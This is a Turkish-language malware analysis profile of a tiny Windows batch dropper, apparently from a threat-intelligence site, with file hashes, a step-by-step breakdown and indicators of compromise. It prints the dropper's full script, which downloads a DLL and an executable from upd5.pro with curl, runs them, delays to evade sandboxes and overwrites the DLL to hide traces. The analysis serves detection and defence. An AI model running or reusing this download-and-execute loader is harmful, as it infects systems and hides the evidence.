Derin Analiz - Dropper BAT (upd5.pro) | Tehdit: YUKSEK
Dosya Kimligi
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| Boyut | 326 byte - Sadece 326 bayt! Ultra kompakt dropper |
| Tip | DOS BAT script (Windows Batch dosyasi) |
Tam Icerik
@echo off\necho "-> Loading update 2..."\ncurl -o 02.dll https://upd5.pro/update/02.dll\nrundll32.exe 02.dll,checkit\necho "-> Loading update 2 tool..."\ncurl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe\nping -n 5 localhost > nul\nqd_x86.exe\ntype c:\Windows\System32\conhost.exe > 02.dll\necho "-> Done."
Teknik Analiz
1. curl ile 02.dll indirilir:\n https://upd5.pro/update/02.dll\n2. rundll32.exe 02.dll,checkit -> DLL calistirilir (export: checkit)\n3. curl ile qd_x86.exe indirilir:\n https://upd5.pro/update/qd_x86.exe\n4. ping -n 5 localhost -> 5 saniye bekleme (sandbox atlama)\n5. qd_x86.exe calistirilir\n6. type conhost.exe > 02.dll -> DLL uzerine conhost yazilir (iz silme!)\n\nDomain: upd5.pro -> "update5 pro" = sahte guncelleme sunucusu\nTechnique: LOLBins (curl, rundll32, ping, type - hepsi yerlesik Windows araci)
IOC
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| C2 | https://upd5.pro/update/02.dll |
| C2 | https://upd5.pro/update/qd_x86.exe |
| Teknik | rundll32 LOLBin, trace silme (conhost overwrite) |
DropperBAT — Malware Profile
Ultra kompakt (326 byte) BAT dropper. LOLBins kullanir: curl, rundll32, ping, type. upd5.pro sahte guncelleme sunucusundan 02.dll ve qd_x86.exe indirir. Iz silme: conhost.exe ile DLL uzerine yazma.
Malware Type
Loader
Programming Language
Batch
C2 Protocol
HTTPS
Target Systems
Kuresel
Capabilities & Behavior
Payload İndirme
Süreç Enjeksiyonu
Modüler Mimari
Kimlik Bilgisi Hırsızlığı
Yanal Hareket
Kalıcılık
Anti-VM/Sandbox
İkincil Payload Dağıtımı
IOC List (3 indicators)
IOC — DropperBAT
# SHA256
3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
# URL
https://upd5.pro/update/02.dll
# URL
https://upd5.pro/update/qd_x86.exe
| Type | Value | Note |
|---|---|---|
| sha256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d | |
| url | https://upd5.pro/update/02.dll | |
| url | https://upd5.pro/update/qd_x86.exe |